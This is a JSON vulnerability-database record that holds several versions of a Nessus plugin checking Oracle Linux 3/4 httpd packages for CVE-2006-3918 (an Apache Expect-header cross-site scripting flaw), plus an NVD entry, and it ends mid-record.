value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"httpd-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"httpd-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"httpd-devel-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"mod_ssl-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.46-61.ent.0.1\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-devel-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-manual-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-manual-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-suexec-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-suexec-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"mod_ssl-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.52-28.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "title": "Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:26:45"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-suexec", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:httpd-manual", "cpe:/o:oracle:linux:4"], "cvelist": ["CVE-2006-3918"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "From Red Hat Security Advisory 2006:0619 :\n\nUpdated Apache httpd packages that correct security issues and resolve bugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect header by a third-party attacker, it was recently discovered that certain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page with a malicious Flash applet, a cross-site scripting attack against the server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue in the handling of malformed Expect headers, the page produced by the cross-site scripting attack will only be returned after a timeout expires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain a backported patch to correct these issues.", "edition": 4, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "629ac978e2b995b0f951c1afa871ab7d530fd011b49ac27d6d0207438a0332c7", "hashmap": [{"hash": "bb8c22eff55de3cc61125b8bb6e73788", "key": "cpe"}, {"hash": "7152f4f2dfa4e1cc7db86648913b8ac9", "key": "pluginID"}, {"hash": "6720baafdcfc97a14557b27983316737", "key": "description"}, {"hash": "85ca20f7ea83b0470da973dc873f713f", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7681b31382abbd9bd923620bc259cb93", "key": "title"}, {"hash": "2e3c438f66403fd816adabf5a1b82b29", "key": "modified"}, {"hash": "fb9158df54dcee8bea6dba7dab140474", "key": "sourceData"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "d7452313326ed340725f5a5dacde8c59", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "42678e88b0e19817ad2f8430db546cbe", "key": "references"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=67402", "id": "ORACLELINUX_ELSA-2006-0619.NASL", "lastseen": "2018-08-30T19:58:34", "modified": "2018-07-18T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "67402", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2007-March/000078.html", "https://oss.oracle.com/pipermail/el-errata/2006-November/000001.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2006:0619 and \n# Oracle Linux Security Advisory ELSA-2006-0619 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67402);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/18 17:43:55\");\n\n script_cve_id(\"CVE-2006-3918\");\n script_bugtraq_id(19661);\n script_xref(name:\"RHSA\", value:\"2006:0619\");\n\n script_name(english:\"Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2006:0619 :\n\nUpdated Apache httpd packages that correct security issues and resolve\nbugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the\nserver was returned to the user in an unescaped error message. This\ncould allow an attacker to perform a cross-site scripting attack if a\nvictim was tricked into connecting to a site and sending a carefully\ncrafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect\nheader by a third-party attacker, it was recently discovered that\ncertain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page\nwith a malicious Flash applet, a cross-site scripting attack against\nthe server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue\nin the handling of malformed Expect headers, the page produced by the\ncross-site scripting attack will only be returned after a timeout\nexpires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain\na backported patch to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-March/000078.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"httpd-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"httpd-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"httpd-devel-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"mod_ssl-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.46-61.ent.0.1\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-devel-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-manual-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-manual-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-suexec-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-suexec-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"mod_ssl-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.52-28.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "title": "Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:58:34"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "bb8c22eff55de3cc61125b8bb6e73788"}, {"key": "cvelist", "hash": "d7452313326ed340725f5a5dacde8c59"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "6720baafdcfc97a14557b27983316737"}, {"key": "href", "hash": "85ca20f7ea83b0470da973dc873f713f"}, {"key": "modified", "hash": "2e3c438f66403fd816adabf5a1b82b29"}, {"key": "naslFamily", "hash": "e31ed89ab0cbb68ce2c40f17ec1e5483"}, {"key": "pluginID", "hash": "7152f4f2dfa4e1cc7db86648913b8ac9"}, {"key": "published", "hash": "0db193a0effe2d65dffecdb5e4d9c241"}, {"key": "references", "hash": "42678e88b0e19817ad2f8430db546cbe"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "fb9158df54dcee8bea6dba7dab140474"}, {"key": "title", "hash": "7681b31382abbd9bd923620bc259cb93"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "f5e25aeeaa04c456a0365864c02f4ffda63e1459760a27f966627c8ca92f7c3f", "viewCount": 1, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2006:0619 and \n# Oracle Linux Security Advisory ELSA-2006-0619 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67402);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/18 17:43:55\");\n\n script_cve_id(\"CVE-2006-3918\");\n script_bugtraq_id(19661);\n script_xref(name:\"RHSA\", value:\"2006:0619\");\n\n script_name(english:\"Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2006:0619 :\n\nUpdated Apache httpd packages that correct security issues and resolve\nbugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the\nserver was returned to the user in an unescaped error message. This\ncould allow an attacker to perform a cross-site scripting attack if a\nvictim was tricked into connecting to a site and sending a carefully\ncrafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect\nheader by a third-party attacker, it was recently discovered that\ncertain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page\nwith a malicious Flash applet, a cross-site scripting attack against\nthe server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue\nin the handling of malformed Expect headers, the page produced by the\ncross-site scripting attack will only be returned after a timeout\nexpires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain\na backported patch to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-March/000078.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"httpd-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"httpd-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"httpd-devel-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"mod_ssl-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.46-61.ent.0.1\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-devel-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-manual-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-manual-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-suexec-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-suexec-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"mod_ssl-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.52-28.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "naslFamily": "Oracle Linux Local Security Checks", "pluginID": "67402", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-suexec", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:httpd-manual", "cpe:/o:oracle:linux:4"]}

{"cve": [{"lastseen": "2017-10-11T11:06:44", "references": ["http://www.ubuntu.com/usn/usn-575-1", "http://www.vupen.com/english/advisories/2006/3264", "http://securityreason.com/securityalert/1294", "http://www.vupen.com/english/advisories/2006/2964", "http://securitytracker.com/id?1016569", "http://www.vupen.com/english/advisories/2006/4207", "http://archives.neohapsis.com/archives/bugtraq/2006-05/0151.html", "http://www-1.ibm.com/support/docview.wss?uid=swg1PK24631", "http://www.novell.com/linux/security/advisories/2006_51_apache.html", "http://www.debian.org/security/2006/dsa-1167", "http://rhn.redhat.com/errata/RHSA-2006-0618.html", "http://lists.opensuse.org/opensuse-security-announce/2008-04/msg00004.html", "http://marc.info/?l=bugtraq&m=130497311408250&w=2", "http://archives.neohapsis.com/archives/bugtraq/2006-07/0425.html", "http://kb.vmware.com/KanisaPlatform/Publishing/466/5915871_f.SAL_Public.html", "ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P", "http://svn.apache.org/viewvc?view=rev&revision=394965", "http://www.securitytracker.com/id?1024144", "http://support.avaya.com/elmodocs2/security/ASA-2006-194.htm", "http://marc.info/?l=bugtraq&m=129190899612998&w=2", "http://www.vupen.com/english/advisories/2006/2963", "http://www.vupen.com/english/advisories/2010/1572", "http://www.redhat.com/support/errata/RHSA-2006-0619.html", "http://rhn.redhat.com/errata/RHSA-2006-0692.html", "http://marc.info/?l=bugtraq&m=125631037611762&w=2", "http://openbsd.org/errata.html#httpd2", "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3117", "http://www.f-secure.com/en_EMEA/support/security-advisory/fsc-2010-2.html", "http://www-1.ibm.com/support/docview.wss?uid=swg24013080", "http://www.vupen.com/english/advisories/2006/5089", "http://www.securityfocus.com/bid/19661"], "description": "http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.", "edition": 2, "reporter": "NVD", "published": "2006-07-27T20:04:00", "title": "CVE-2006-3918", "type": "cve", "enchantments": {"score": {"modified": "2017-10-11T11:06:44", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10352", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10352"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-3918"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10352", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10352"}], "modified": "2017-10-10T21:31:08", "cpe": ["cpe:/a:ibm:http_server:6.0", "cpe:/a:apache:http_server:1.3.22", "cpe:/a:apache:http_server:2.2", "cpe:/a:apache:http_server:1.3.17", "cpe:/a:apache:http_server:2.2.1", "cpe:/a:apache:http_server:2.0", "cpe:/a:apache:http_server:2.0.57", "cpe:/a:apache:http_server:1.3.1", "cpe:/a:apache:http_server:1.3.20", "cpe:/a:apache:http_server:1.3.19", "cpe:/a:apache:http_server:1.3.12::win32", "cpe:/a:apache:http_server:1.3.12", "cpe:/a:apache:http_server:1.3.11::win32", "cpe:/a:ibm:http_server:6.1", "cpe:/a:apache:http_server:1.3", "cpe:/a:apache:http_server:1.3.18"], "id": "CVE-2006-3918", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3918", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2018-09-01T23:57:39", "references": ["http://www.nessus.org/u?193d64f0", "http://www.nessus.org/u?29a2345f", "http://www.nessus.org/u?7e0e9457", "http://www.nessus.org/u?713ca316"], "pluginID": "22207", "description": "Updated Apache httpd packages that correct security issues and resolve bugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted 